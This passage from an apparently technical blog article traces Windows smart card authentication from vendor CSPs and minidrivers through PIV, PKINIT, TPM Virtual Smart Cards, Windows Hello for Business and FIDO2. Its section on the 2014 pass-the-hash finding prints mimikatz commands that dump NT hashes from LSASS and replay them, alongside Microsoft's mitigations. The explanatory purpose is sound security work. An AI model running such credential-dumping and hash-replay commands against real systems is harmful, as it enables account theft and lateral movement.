&lt;p&gt;Cryptographic clients do not want to write APDU sequences. They want to call &lt;code&gt;CryptSignHash&lt;/code&gt; or &lt;code&gt;NCryptSignHash&lt;/code&gt; and have a signature appear. Translating those API calls into the card&apos;s APDU command set is the job of a Cryptographic Service Provider in the CryptoAPI 1.0 world and a Key Storage Provider in the &lt;a href=&quot;https://paragmali.com/blog/cng-architecture-bcrypt-ncrypt-ksps/&quot; rel=&quot;noopener&quot;&gt;CNG (Cryptography Next Generation)&lt;/a&gt; world. From 1996 to 2007, almost every card vendor wrote its own CSP. The Schlumberger CSP. The Gemalto CSP. The Axalto CSP. The ActivIdentity CSP. Each was an in-process DLL that talked to the card through WinSCard, applied vendor-specific quirks, and exposed a CSP interface to Windows.&lt;/p&gt;

A plug-in for CryptoAPI 1.0 that provides cryptographic services (key generation, signing, hashing, key storage) to applications. CryptoAPI loads a CSP in-process. For smart cards, the CSP translates CryptoAPI calls into card-specific APDUs through WinSCard. Microsoft Base Smart Card CSP, shipped in 2007, replaced the per-vendor CSP with a single CSP that delegated card-specific behaviour to a much smaller minidriver.

The CNG-era plug-in that provides key storage and asymmetric cryptographic operations. CNG separates algorithm providers (BCrypt: hashing, symmetric, signature primitives) from key storage providers (NCrypt: key lifecycle, key-protected operations). The Microsoft Smart Card Key Storage Provider is the CNG-side path for smart card and Virtual Smart Card keys; the Microsoft Platform Crypto Provider is its sibling that talks to the TPM directly.
&lt;p&gt;The architecture had two problems by 2003. First, an N x M combinatorial. Every new card vendor multiplied integration cost for every cryptographic application, and vice versa. Large enterprises ran two or three CSPs per workstation; subtle bugs in signature padding or PIN caching only surfaced when an application built for vendor A&apos;s CSP met a card configured for vendor B&apos;s. Second, a security problem: each CSP ran in-process with every CryptoAPI client, so a buggy or compromised third-party CSP could reach critical OS components.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s answer was the Smart Card Minidriver Specification, finalised around the Vista launch in 2006-2007. Microsoft would ship one CSP -- the Microsoft Base Smart Card CSP -- containing the cryptographic state machine common to all PIV-style cards. Per-card behaviour would live in a much smaller DLL called a minidriver, loaded by the Base CSP when it recognised the card. The specification, &lt;code&gt;dn631754&lt;/code&gt;, currently maintained at v7.07, says exactly this: &quot;The Microsoft Smart Card Base CSP and KSP is a refinement of the architecture that separates commonly needed CAPI-based CSP and CNG-based KSP functionality, respectively, from the implementation details that must change for every card vendor&quot; [@sc-minidrivers] [@sc-minidriver-spec].&lt;/p&gt;
&lt;p&gt;The CNG-side sibling, the Microsoft Smart Card Key Storage Provider, plugs into the same minidriver layer. CNG is the post-Vista cryptographic platform: BCrypt for algorithm primitives, NCrypt for key lifecycle and storage [@cng-storage]. The Smart Card KSP supports DH 512-4096, ECDH P256/P384/P521, ECDSA P256/P384/P521, and RSA 512-16384 [@cng-ksp-list]. Both the legacy Base CSP and the modern KSP route through the same minidriver, so a card vendor writes one DLL and gets compatibility with both CryptoAPI 1.0 and CNG applications.&lt;/p&gt;

flowchart TD
    A[Reader hardware] --&amp;gt; B[IFD driver]
    B --&amp;gt; C[SCardSvr Smart Card Resource Manager]
    C --&amp;gt; D[WinSCard user-mode API]
    D --&amp;gt; E[Microsoft Base Smart Card CSP and Smart Card KSP]
    E --&amp;gt; F[Card minidriver DLL]
    F --&amp;gt; G[ISO 7816-4 APDU on the card]
    H[CryptoAPI 1.0 client] --&amp;gt; E
    I[CNG NCrypt client] --&amp;gt; E
&lt;p&gt;CryptoAPI&apos;s &lt;code&gt;CryptSignHash&lt;/code&gt; walks the Base CSP; CNG&apos;s &lt;code&gt;NCryptSignHash&lt;/code&gt; walks the Smart Card KSP; both end up issuing the same APDU sequence through the same minidriver to the same card.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;CryptoAPI Base CSP&lt;/th&gt;
&lt;th&gt;CNG Smart Card KSP&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Era&lt;/td&gt;
&lt;td&gt;CryptoAPI 1.0, pre-Vista to present (legacy support)&lt;/td&gt;
&lt;td&gt;CNG, Vista onward&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Entry point&lt;/td&gt;
&lt;td&gt;&lt;code&gt;CryptAcquireContext&lt;/code&gt;, &lt;code&gt;CryptSignHash&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;NCryptOpenStorageProvider&lt;/code&gt;, &lt;code&gt;NCryptSignHash&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Implementation DLL&lt;/td&gt;
&lt;td&gt;&lt;code&gt;basecsp.dll&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;microsoft smart card key storage provider&lt;/code&gt; registered through &lt;code&gt;ncrypt.dll&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-card extension&lt;/td&gt;
&lt;td&gt;Smart card minidriver&lt;/td&gt;
&lt;td&gt;Same smart card minidriver&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Algorithm range&lt;/td&gt;
&lt;td&gt;RSA, basic ECC&lt;/td&gt;
&lt;td&gt;RSA, full Suite B ECC, large key ranges&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;By 2008 the architecture was elegant. But every PIV card still needed a minidriver acquired from somewhere -- a CD, a vendor ftp site, an enterprise distribution share. And in 2004 the US federal government was about to make the smart card mandatory for several million people who could not wait for a vendor disk.&lt;/p&gt;
&lt;h2&gt;4. PIV, GIDS, CAC, and the Inbox Driver That Removed the Last Install Step&lt;/h2&gt;
&lt;p&gt;On August 27, 2004, President George W. Bush signed Homeland Security Presidential Directive 12, a one-page policy with one operational sentence: there shall be &quot;a mandatory, government-wide standard for secure and reliable forms of identification issued by the federal government to its employees and contractors&quot; [@hspd-12]. HSPD-12 did not specify how. It pointed at the National Institute of Standards and Technology and said &quot;make it so.&quot;&lt;/p&gt;
&lt;p&gt;NIST&apos;s response was FIPS 201, the Personal Identity Verification standard, first published in February 2005. The current revision, FIPS 201-3, was published in January 2022, superseding FIPS 201-2 from 2013 [@fips-201-3] [@fips-201-3-pdf]. Where FIPS 201 specifies the credential -- what a PIV card is, biometrically, biographically, visually -- the companion NIST SP 800-73 specifies the card-edge interface: file system, data objects, APDU command set [@sp-800-73-4-upd1].&lt;/p&gt;

The US federal smart card identity credential defined by FIPS 201 and its companion NIST Special Publications. FIPS 201 defines what a PIV credential is; NIST SP 800-73 defines the card-edge interface (file structure, data objects, APDU command set) so any host can talk to any PIV-compliant card; SP 800-78 covers cryptographic algorithms; SP 800-76 covers biometrics; SP 800-79 covers card issuer accreditation.
&lt;p&gt;The numbers are striking. NIST reports &quot;close to five million PIV Cards today provide multifactor authentication to federal IT resources and facilities&quot; [@nist-piv-home]. The largest single cohort is the DoD Common Access Card (CAC), which by 2002 numbers had reached more than one million card readers across more than 1,000 issuance sites in more than 25 countries [@wp-cac].&lt;/p&gt;
&lt;p&gt;Microsoft, watching from Redmond, faced two choices: negotiate a separate minidriver for the GSC-IS card-edge applet some federal agencies were using, or ship an inbox class minidriver that auto-discovered PIV-compliant cards out of the box -- and for completeness, supported a Microsoft-defined alternative called the Generic Identity Device Specification.&lt;/p&gt;
&lt;p&gt;GIDS, Microsoft&apos;s complementary card-edge profile, shipped v1.0 in April 2010 and v2.0 in October 2012 [@gids-spec]. It was a profile for card vendors and TPM integrators who wanted a Microsoft-blessed alternative to PIV, and it would become important to Windows 8&apos;s Virtual Smart Card design.&lt;/p&gt;

The Generic Identity Device Specification, a Microsoft-published smart card profile for identity credentials. GIDS v1.0 published April 2010; v2.0 published October 2012. GIDS coexists with PIV at the inbox minidriver layer: Windows&apos; inbox `msclmd.dll` recognises both, allowing zero-install integration for any card that implements either applet.
&lt;p&gt;The inbox driver shipped in Windows 7 SP1 in February 2011. Microsoft Learn is direct: &quot;Windows provides an inbox generic class minidriver that supports Personal Identity Verification (PIV)-compliant smart cards and cards that implement the Generic Identity Device Specification (GIDS) card edge&quot; [@inbox-minidriver]. The auto-discovery sequence is sequential: &lt;code&gt;msclmd.dll&lt;/code&gt; issues a &lt;code&gt;SELECT&lt;/code&gt; for the PIV AID; if the card returns &lt;code&gt;90 00&lt;/code&gt;, Windows treats it as PIV. If the PIV select fails, the driver tries the GIDS AID; if that succeeds, Windows treats the card as GIDS. If both selects return a &quot;neither-AID-exists&quot; status, Windows still proceeds as if the card were GIDS, and the inbox driver continues to handle it. Only an unknown SELECT error makes the inbox driver decline and Windows fall back to a vendor minidriver [@inbox-minidriver]. The effect: any PIV-compliant card (CAC, Yubico YubiKey 5 [@yubico-piv], any FIPS 201-compliant federal credential) worked on a stock Windows 7 SP1 install with zero additional software.&lt;/p&gt;

Before Windows 7 SP1, deploying a CAC to a workstation required an out-of-band CSP install: a vendor disk, an enterprise distribution share, or a manual download. Some classified networks could not reach the vendor distribution channels at all. The inbox `msclmd.dll` removed that friction. A workstation that had never been online could authenticate a CAC user on first boot, provided it was joined to a domain whose KDC chain it could reach for PKINIT validation. Many DoD operational deployments lived inside the airgap, and many of them only became deployable at scale once the inbox minidriver had landed.
&lt;p&gt;With the card-edge problem solved and the install problem closed, what remained was the protocol Windows logon would use. That protocol is PKINIT.&lt;/p&gt;

Public Key Cryptography for Initial Authentication in Kerberos. Specified by [RFC 4556](#) [@rfc-4556] and profiled for Windows by `[MS-PKCA]` [@ms-pkca]. PKINIT lets a Kerberos client present an X.509 certificate, and prove possession of the private key, as pre-authentication for the Authentication Service Request (AS-REQ), instead of a password-derived shared secret. The Windows AS Exchange remains otherwise unchanged: the client receives a TGT encrypted with a session key established under the public-key exchange.

The PKINIT structure that carries the client&apos;s proof of possession. It contains a `PKAuthenticator` (cusec, ctime, nonce, paChecksum) and Diffie-Hellman parameters. The client signs the `AuthPack` with the private key corresponding to its certificate, then embeds the signed structure in the `PA-PK-AS-REQ` pre-authentication data of the Kerberos AS-REQ. The granularity matters: the signature covers the `AuthPack`, not the AS-REQ as a whole.
&lt;p&gt;In a Windows smart card logon the path from PIN to TGT runs through eight named components. Walk it once and the rest of the article becomes legible.&lt;/p&gt;

sequenceDiagram
    participant U as User at lock screen
    participant CP as Credential Provider
    participant LSA as LSASS Kerberos client
    participant KSP as Microsoft Smart Card KSP
    participant MD as Minidriver
    participant CARD as Smart card
    participant KDC as Domain Controller KDC&lt;pre&gt;&lt;code&gt;U-&amp;gt;&amp;gt;CP: Insert card, type PIN
CP-&amp;gt;&amp;gt;LSA: Logon attempt with PIV credential
LSA-&amp;gt;&amp;gt;KSP: NCryptSignHash on AuthPack hash
KSP-&amp;gt;&amp;gt;MD: Card-specific sign request
MD-&amp;gt;&amp;gt;CARD: VERIFY PIN, then SIGN APDU
CARD--&amp;gt;&amp;gt;MD: Signed AuthPack bytes, SW=9000
MD--&amp;gt;&amp;gt;KSP: Signed AuthPack
KSP--&amp;gt;&amp;gt;LSA: Signed AuthPack
LSA-&amp;gt;&amp;gt;KDC: AS-REQ with PA-PK-AS-REQ pre-auth
KDC-&amp;gt;&amp;gt;KDC: Verify signature, cert chain, freshness
KDC--&amp;gt;&amp;gt;LSA: AS-REP with TGT
LSA--&amp;gt;&amp;gt;CP: Logon success, session keys cached
CP--&amp;gt;&amp;gt;U: Desktop
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Notice what the card sees and what it does not. It sees a hash to sign and a PIN to verify. It does not see &quot;I am authenticating to KDC &lt;code&gt;DC01.contoso.local&lt;/code&gt; for user &lt;code&gt;jdoe&lt;/code&gt;.&quot; A PIV card is a signing oracle. The relying party identity, the freshness, the replay window, the binding of signature to context: all of that lives in the protocol above the card, not in the card itself. We come back to this in section 8.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The cryptographic primitive at the centre of the smart card metaphor -- a non-exportable asymmetric key, bound to a tamper-resistant element, gated by a local gesture -- is the longest-lived object in this lineage. The interface around the primitive (PC/SC, CryptoAPI, CNG, NCrypt-direct, WebAuthn) is what changes every generation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;By 2013 the cryptographic story was excellent. PKINIT was a clean Kerberos AS exchange. The card protected the key. The KDC issued a TGT. Then, in a few months in 2014, one researcher in Tel Aviv showed that the protection ended at the very moment of signing.&lt;/p&gt;
&lt;h2&gt;5. KB2871997 and the NTLM Secondary Credential&lt;/h2&gt;
&lt;p&gt;Tal Be&apos;ery, then Vice President of Research at Aorato, sat down in early 2014 with a question that should have had a boring answer. If an Active Directory account is flagged &quot;smart card required for interactive logon,&quot; and the user has no password, is the account immune to pass-the-hash?&lt;/p&gt;
&lt;p&gt;The answer is no. Aorato&apos;s original disclosure post is offline; Microsoft acquired Aorato in November 2014 and the research became the foundation of what is now Microsoft Defender for Identity. The period-accurate operator analysis that survives in public is Sander Berkouwer&apos;s July 15, 2014 dirteam.com writeup, cited here in lieu of the dead original [@dirteam-aorato].&lt;/p&gt;
&lt;p&gt;The attack is built from three off-the-shelf parts. The first is the NTLM secondary credential we met in section 1: every smart-card-only account in Active Directory has a usable NT hash on the KDC, maintained for legacy compatibility. The second is the harvesting tool. Benjamin Delpy&apos;s &lt;code&gt;mimikatz&lt;/code&gt; had reached its 2.0-alpha milestone in April 2014; the README documents &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; extracting NT hashes from LSASS, plus &lt;code&gt;sekurlsa::pth&lt;/code&gt; and golden-ticket forgery for replay [@mimikatz-gh]. The third is the cryptographic identity that makes hashes Kerberos-relevant. &lt;a href=&quot;#&quot; rel=&quot;noopener&quot;&gt;RFC 4757&lt;/a&gt; section 2 establishes that the RC4-HMAC long-term key in Kerberos is the NT hash itself, &quot;for compatibility reasons&quot; [@rfc-4757] [@dirteam-aorato].&lt;/p&gt;
&lt;p&gt;Compose those three parts. An attacker with administrative footing on any machine the user has touched runs &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; against LSASS and gets the NT hash. By RFC 4757 the hash is a usable Kerberos RC4-HMAC pre-authentication key for the user; pre-auth is a function of the long-term key, so the attacker can request a TGT. Or they replay the hash directly via SMB. The card sits, intact, in the user&apos;s reader. Nothing about it has changed.&lt;/p&gt;

The smart card&apos;s tamper-resistance was real. But the cryptographic guarantee terminated at the act of signing -- not at the authentication outcome.
&lt;p&gt;This is the article&apos;s central inversion. The card was right. The system was wrong. The card protected the &lt;em&gt;key&lt;/em&gt;; the OS minted &lt;em&gt;credentials around&lt;/em&gt; that key the card could not police; the protection terminated at the signing operation; the identity did not.&lt;/p&gt;

Given an interactive shell as Local System or a debug-privileged user, the harvest is two commands:&lt;pre&gt;&lt;code&gt;privilege::debug
sekurlsa::logonpasswords
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; walks LSASS sessions and prints any cached NT hashes, including the rotated secondary credential for smart-card-required users. The pass-the-hash replay is one more:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sekurlsa::pth /user:JaneDoe /domain:CONTOSO /ntlm:a1b2c3...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This launches a process whose Kerberos ticket cache accepts the supplied NT hash as the RC4-HMAC pre-auth key for the named principal. Any tool spawned from that process can request service tickets for the user. The smart card need not be in any reader on any machine on the network. KB 2871997 and the Pass-the-Hash mitigations (KB 2984972, 2984976, 2984981) addressed this defence-in-depth; NTLM removal addresses it structurally.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response shipped on May 13, 2014 as Security Advisory KB 2871997, &quot;Update to improve credentials protection and management.&quot; It is mostly a registry change and a recommended Group Policy: set &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\TokenLeakDetectDelaySecs&lt;/code&gt; to 30 seconds [@kb-2871997]. The June 2014 MSRC blog added more context, especially around a new security group called &lt;a href=&quot;https://paragmali.com/blog/who-is-allowed-to-log-in-where-the-kdc-side-answer-to-creden/&quot; rel=&quot;noopener&quot;&gt;Protected Users&lt;/a&gt; [@msrc-kb-2871997].&lt;/p&gt;
&lt;p&gt;Protected Users, added to Windows Server 2012 R2 domains and Windows 8.1 clients, blocks NTLM, blocks DES and RC4 in Kerberos pre-authentication, blocks both forms of delegation, and prevents offline sign-in caching [@protected-users]. Add a privileged account to Protected Users and you force it off the RC4-HMAC code path. An attacker who steals the NT hash no longer has a usable Kerberos pre-auth key, even though the hash itself is still recoverable.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s later response was &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt;, which isolates credential material in a Virtualization-Based Security (VBS) container called LSAISO, separated from LSASS by a Hyper-V trust boundary. On Windows 11 22H2 and Server 2025, Credential Guard is enabled by default on domain-joined, non-DC systems that meet hardware requirements, protecting NTLM hashes, Kerberos TGTs, and stored domain credentials [@credential-guard].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The KB 2871997 family (TokenLeakDetectDelaySecs, Protected Users, LSA Protection / RunAsPPL, Credential Guard later) is defence-in-depth. It makes hash theft harder, the harvested hash less universally useful, and lateral movement more visible. None of those measures removes the secondary NT hash itself. The structural fix is to &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;remove NTLM&lt;/a&gt;. That work began in earnest with the 2023 &quot;evolution of Windows authentication&quot; announcement and reached its first hard milestone with the NTLMv1 removal in Windows 11 24H2 and Windows Server 2025 [@evolution-windows-auth] [@ntlmv1-removal].&lt;/p&gt;
&lt;/blockquote&gt;

Two sentences look identical but mean very different things: &quot;the card protected the key&quot; and &quot;the system protected the user.&quot; The first is a statement about a piece of hardware and the cryptographic discipline of its operation; it was true in 1996, true in 2014, true today. The second is a statement about the authentication subsystem that uses the card. In 2014 it was false, and the falsehood had been present for fourteen years, hidden under the assumption that strong cryptography at the card edge guaranteed a corresponding strength of identity assertion. The 2014 disclosure was a forcing function for distinguishing the two. Every subsequent design (VSC, WHfB, FIDO2) can be evaluated by where it draws that line.
&lt;p&gt;If the card alone could not deliver the protection, perhaps the right move was to throw away the &lt;em&gt;physical&lt;/em&gt; card entirely. Microsoft had shipped exactly that experiment eighteen months earlier.&lt;/p&gt;
&lt;h2&gt;6. Virtual Smart Cards in Windows 8&lt;/h2&gt;
&lt;p&gt;On October 26, 2012, Microsoft shipped Windows 8. Buried in the new features, alongside the Start screen redesign and the Hyper-V client, was a command-line tool named &lt;code&gt;tpmvscmgr.exe&lt;/code&gt; that created a smart card without any plastic. The tool is still there. Open an elevated prompt on a current Windows installation and type &lt;code&gt;tpmvscmgr create /name vsc1 /AdminKey DEFAULT /PIN PROMPT&lt;/code&gt;, and the system manufactures a new entry under &lt;code&gt;ROOT\SMARTCARDREADER\&lt;/code&gt; that any PC/SC client sees as a freshly inserted card [@tpmvscmgr].&lt;/p&gt;
&lt;p&gt;The pitch is mechanical. Every Windows 8+ device with a &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;Trusted Platform Module&lt;/a&gt; already has the cryptographic substrate of a smart card on the motherboard: a tamper-resistant chip, a non-exportable key store, dictionary-attack resistance, an isolated execution environment for crypto. Why not implement the smart card abstraction in software, with the TPM as the backing chip [@vsc-overview] [@vsc-understanding]?&lt;/p&gt;
&lt;p&gt;The Microsoft Learn &quot;Virtual Smart Card Overview&quot; makes the framing crisp. The three core properties of a smart card -- non-exportability, isolated cryptography, anti-hammering -- map directly onto TPM capabilities. Non-exportability becomes TPM key wrapping. Isolated cryptography becomes signing inside the TPM. Anti-hammering becomes the TPM&apos;s dictionary-attack counter [@vsc-overview] [@vsc-understanding].&lt;/p&gt;

A TPM-backed software smart card introduced in Windows 8 (October 2012). A VSC exposes the same PC/SC card edge as a physical card -- the same WinSCard API, the same Base CSP, the same Microsoft Smart Card KSP, the same minidriver model. The chip backing the card is the TPM, soldered to the motherboard, rather than a removable IC on a plastic substrate. From the perspective of any application using the WinSCard API, a VSC is indistinguishable from a permanently-inserted physical smart card.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Windows 8 shipped Virtual Smart Cards in October 2012. The Trusted Computing Group did not ratify TPM 2.0 until 2014. VSCs are therefore a &lt;em&gt;TPM-binding policy&lt;/em&gt; technology, not a TPM-2.0-bound technology; Microsoft Learn lists TPM 1.2 as the documented minimum. TPM 2.0 works and is the practical choice on modern Windows 11 installations, but the architecture predates it [@vsc-overview] [@vsc-understanding].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The beauty of the design is that nothing above the chip changed. Applications still call &lt;code&gt;CryptSignHash&lt;/code&gt; or &lt;code&gt;NCryptSignHash&lt;/code&gt;. The Base CSP and Smart Card KSP still route through a minidriver. The minidriver still sends APDUs through WinSCard to a reader. The only differences: the reader is a software pseudo-device named &lt;code&gt;Microsoft Virtual Smart Card&lt;/code&gt;, and the card behind it is the TPM dressed up as an ISO 7816-4 applet.&lt;/p&gt;

flowchart LR
    subgraph Physical [Physical smart card]
        A1[Application] --&amp;gt; B1[CSP/KSP]
        B1 --&amp;gt; C1[Minidriver]
        C1 --&amp;gt; D1[WinSCard]
        D1 --&amp;gt; E1[USB reader]
        E1 --&amp;gt; F1[Plastic card IC]
    end
    subgraph Virtual [Virtual smart card]
        A2[Application] --&amp;gt; B2[CSP/KSP]
        B2 --&amp;gt; C2[Minidriver]
        C2 --&amp;gt; D2[WinSCard]
        D2 --&amp;gt; E2[Virtual reader]
        E2 --&amp;gt; F2[TPM on motherboard]
    end
&lt;p&gt;The cryptographic substrate underneath the abstraction is the TPM, and the binding policy is per-device. The Microsoft Learn &quot;Understanding and Evaluating Virtual Smart Cards&quot; article is precise: &quot;Non-exportability: Because all private information on the virtual smart card is encrypted by using the TPM on the host computer, it can&apos;t be used on a different computer with a different TPM&quot; [@vsc-understanding]. The property that makes a VSC tamper-resistant also makes it un-migratable. A TPM clear destroys the keys irrecoverably. We return to that in section 8.&lt;/p&gt;
&lt;p&gt;The canonical primary source for the architecture is the &quot;Understanding and Evaluating Virtual Smart Cards&quot; whitepaper on the Microsoft Download Center. The download page reports &lt;code&gt;Version: July 2014, Date Published: 7/15/2024&lt;/code&gt; [@vsc-whitepaper]. The 2014 revision is canonical.&lt;/p&gt;

The card was a metaphor. Microsoft kept the byte-for-byte PC/SC interface and put the TPM behind it.
&lt;p&gt;A worked provisioning example brings the design to ground. The &lt;code&gt;tpmvscmgr create&lt;/code&gt; command takes four arguments that matter for security policy: the administrative key (&lt;code&gt;/AdminKey {DEFAULT | PROMPT | RANDOM}&lt;/code&gt;), the PIN policy (&lt;code&gt;/PIN PROMPT&lt;/code&gt; or &lt;code&gt;/PIN DEFAULT&lt;/code&gt;), the attestation mode (&lt;code&gt;/attestation {AIK_AND_CERT | AIK_ONLY}&lt;/code&gt;), and the card&apos;s reader instance, surfaced under &lt;code&gt;ROOT\SMARTCARDREADER\000n&lt;/code&gt; in Device Manager [@tpmvscmgr].&lt;/p&gt;
&lt;p&gt;{`
function provisionVSC(opts) {
  const adminKeyMap = {
    DEFAULT: &apos;0102030405060708&apos; + &apos;0102030405060708&apos; + &apos;0102030405060708&apos;,
    PROMPT: &apos;[user-supplied 48 hex chars]&apos;,
    RANDOM: &apos;[random 24-byte key the admin must record]&apos;,
  };
  const attestationNote = {
    AIK_ONLY: &apos;Identity-binding only; no platform certificate chain stored on the card.&apos;,
    AIK_AND_CERT: &apos;Full AIK-and-EK-cert chain stored; supports federated re-enrolment.&apos;,
    NONE: &apos;No attestation; the card is identity-only.&apos;,
  };
  return {
    cardName: opts.name,
    adminKey: adminKeyMap[opts.adminKey] || &apos;invalid&apos;,
    pin: opts.pin === &apos;PROMPT&apos; ? &apos;[user-typed PIN, min 8 chars, alphanumeric+special allowed]&apos; : &apos;12345678&apos;,
    attestation: attestationNote[opts.attestation || &apos;NONE&apos;],
    advice: opts.adminKey === &apos;DEFAULT&apos;
      ? &apos;WARN: default admin key is documented; treat as factory-default.&apos;
      : &apos;OK: admin key not factory-default.&apos;,
  };
}&lt;/p&gt;
&lt;p&gt;console.log(provisionVSC({
  name: &apos;vsc-jdoe&apos;,
  adminKey: &apos;RANDOM&apos;,
  pin: &apos;PROMPT&apos;,
  attestation: &apos;AIK_AND_CERT&apos;,
}));
`}&lt;/p&gt;
&lt;p&gt;The default administrative key &lt;code&gt;010203040506070801020304050607080102030405060708&lt;/code&gt; is documented in the public &lt;code&gt;tpmvscmgr&lt;/code&gt; page [@tpmvscmgr]. Any VSC provisioned with &lt;code&gt;/AdminKey DEFAULT&lt;/code&gt; should be treated as factory-default; in production, supply (&lt;code&gt;PROMPT&lt;/code&gt;) or randomise (&lt;code&gt;RANDOM&lt;/code&gt;) the admin key and store it separately.&lt;/p&gt;
&lt;p&gt;The provisioning chain has four hard-to-script steps: run &lt;code&gt;tpmvscmgr create&lt;/code&gt; as administrator; request and install an authentication certificate from a PKI the domain trusts (typically Microsoft Certificate Services with an enterprise CA and a smart card auto-enrolment template); set the user PIN; log the user out and back in. Each step is a place an enterprise rollout can stall.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Microsoft kept the PC/SC card edge byte-for-byte and put the TPM behind it. The Virtual Smart Card was, technically, exactly that: a software smart card whose chip happened to be soldered to the board. The cryptographic primitive at the centre did not change; only the form factor of the chip carrying it did.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;VSCs solved the physical-distribution problem. They did not solve the user-experience problem -- and they introduced a new one no Windows feature had ever produced quite this way: a credential a hardware reset could permanently destroy.&lt;/p&gt;
&lt;h2&gt;7. WHfB, FIDO2, and the Card Edge That Got Discarded&lt;/h2&gt;
&lt;p&gt;On March 17, 2015, Joe Belfiore announced &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Windows Hello&lt;/a&gt; on the Windows Experience Blog: &quot;I&apos;d like to introduce you to Windows Hello -- biometric authentication which can provide instant access to your Windows 10 devices&quot; [@windows-hello-blog]. The consumer pitch was face and fingerprint. The mechanism underneath, in the enterprise variant called Windows Hello for Business (WHfB), was the same TPM-bound asymmetric key the Virtual Smart Card had used -- except there was no virtual reader, no virtual minidriver, and no virtual APDU.&lt;/p&gt;
&lt;p&gt;WHfB talks to the TPM directly through the Microsoft Platform Crypto Provider, a CNG Key Storage Provider that calls into the TPM rather than into a smart card minidriver [@whfb-overview] [@whfb-how-it-works]. The PC/SC card edge had been removed from the path entirely. The cryptographic primitive (non-exportable TPM-bound asymmetric key, gated by a local gesture, used to sign an authentication request) survived; the interface around the primitive simplified.&lt;/p&gt;
&lt;p&gt;Microsoft Learn describes WHfB in five phases: device registration, provisioning, key synchronisation, certificate enrolment (cert-trust only), authentication. The public key is registered with the identity provider and mapped to the user account; the private key never leaves the device [@whfb-how-it-works]. WHfB ships in three deployment models -- cloud-only, hybrid, on-premises -- and two trust types: key-trust and cert-trust [@whfb-deploy].&lt;/p&gt;
&lt;p&gt;Key-trust is cloud-first. The TPM-bound public key is registered with Microsoft Entra ID; authentication is a public-key proof of possession to Entra, which mints whatever downstream artifacts a federated service needs (PRT, refresh token, optional Kerberos TGT via the cloud Kerberos service). No X.509 certificate sits in the user&apos;s path. Cert-trust adds an X.509 wrapper for downstream services that require one: an enterprise PKI issues a smart-card-logon-style certificate bound to the TPM key, and the WHfB authentication produces a Kerberos PKINIT exchange against an on-premises DC, just as a physical smart card would. The certificate is the adapter to brownfield infrastructure that still expects a smart-card-shaped credential [@whfb-deploy].&lt;/p&gt;
&lt;p&gt;So far the lineage has been Windows-specific. &lt;a href=&quot;https://paragmali.com/blog/webauthn-and-passkeys-on-windows-from-ctap-to-the-credential/&quot; rel=&quot;noopener&quot;&gt;FIDO2&lt;/a&gt; is not. WebAuthn 2 is a W3C Recommendation; CTAP 2.1 is a FIDO Alliance specification [@webauthn-2] [@ctap-2-1]. Together they specify a cross-vendor protocol for public-key authentication to web relying parties, with one load-bearing property the smart card lineage never had: origin binding.&lt;/p&gt;

The property that a WebAuthn credential is scoped to a specific relying party identifier (the RP ID, typically a domain name) and the authenticator will refuse to sign an assertion for any other RP ID. The W3C WebAuthn 2 specification states: &quot;the public key credential can only be accessed by origins belonging to that Relying Party. This scoping is enforced jointly by conforming User Agents and authenticators&quot; [@webauthn-2]. A PIV smart card has no equivalent property; it will sign whatever the host hands it.
&lt;p&gt;Origin binding is the structural fix to a class of relay attacks. A PIV smart card cannot tell whether it is signing a Kerberos AuthPack for the legitimate KDC or a maliciously crafted blob for an attacker-controlled relay; the card has no notion of &quot;what is this signature for.&quot; A WebAuthn authenticator does. It hashes the RP ID into the signed assertion, the relying party verifies the RP ID matches its own origin, and a phishing site cannot trick the authenticator into producing a signature it will accept.&lt;/p&gt;
